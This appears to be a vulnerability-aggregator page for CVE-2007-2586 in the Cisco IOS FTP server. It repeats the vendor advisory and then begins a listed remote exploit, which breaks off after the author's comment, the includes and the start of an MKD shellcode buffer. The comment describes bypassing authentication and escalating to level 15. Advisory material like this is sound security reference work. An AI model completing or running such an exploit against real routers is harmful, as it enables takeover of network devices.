CVE-2007-2586: The FTP Server in Cisco IOS 11.3 through 12.4 does not properly check user authorization, which allows remote attackers to execute arbitrary code, and have…

CVE-2007-2586 [CRITICAL] CWE-399 Multiple Vulnerabilities in the IOS FTP Server Multiple Vulnerabilities in the IOS FTP Server The Cisco IOS FTP Server feature contains multiple vulnerabilities that can result in a denial of service (DoS) condition, improper verification of user credentials, and the ability to retrieve or write any file from the device filesystem, including the device's saved configuration. This configuration file may include passwords or other sensitive information. The IOS FTP Server is an optional service that is disabled by default. Devices that are not specifically configured to enable the IOS FTP Server service are unaffected by these vulnerabilities. This vulnerability does not apply to the IOS FTP Client feature. This advisory is posted at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20070509-iosft

CVE-2007-2586 Multiple Vulnerabilities in the IOS FTP Server CVE-2007-2586: Multiple Vulnerabilities in the IOS FTP Server The Cisco IOS FTP Server feature contains multiple vulnerabilities that can result in a denial of service (DoS) condition, improper verification of user credentials, and the ability to retrieve or write any file from the device filesystem, including the device's saved configuration. This configuration file may include passwords or other sensitive information. The IOS FTP Server is an optional service that is disabled by default. Devices that are not specifically configured to enable the IOS FTP Server service are unaffected by these vulnerabilities. This vulnerability does not apply to the IOS FTP Client feature. This advisory is posted at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-200

CVE-2007-2586 [HIGH] CWE-863 GHSA-m5c2-384p-37r2: The FTP Server in Cisco IOS 11 The FTP Server in Cisco IOS 11.3 through 12.4 does not properly check user authorization, which allows remote attackers to execute arbitrary code, and have other impact including reading startup-config, as demonstrated by a crafted MKD command that involves access to a VTY device and overflows a buffer, aka bug ID CSCek55259.

CVE-2007-2586 Cisco IOS 12.3(18) (FTP Server) - Remote (Attached to GDB) Cisco IOS 12.3(18) (FTP Server) - Remote (Attached to GDB) --- /* Cisco IOS FTP server remote exploit by Andy Davis 2008 Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007 Specific hard-coded addresses for IOS 12.3(18) on a 2621XM router Removes the requirement to authenticate and escalates to level 15 To protect the innocent a critical step has been omitted, which means the shellcode will only execute when the router is attached to gdb. I'm sure the PowerPC shellcoders out there will work it out... Thanks to Gyan Chawdhary and Varun Uppal for all the hours they spent on the original IOS security research iosftpexploit googlemail 'dot' com */ #include #include #include #include #define PORT 21 int main(int argc, char **argv) { unsigned char sendbuf[] = "MKD " /* .equ vty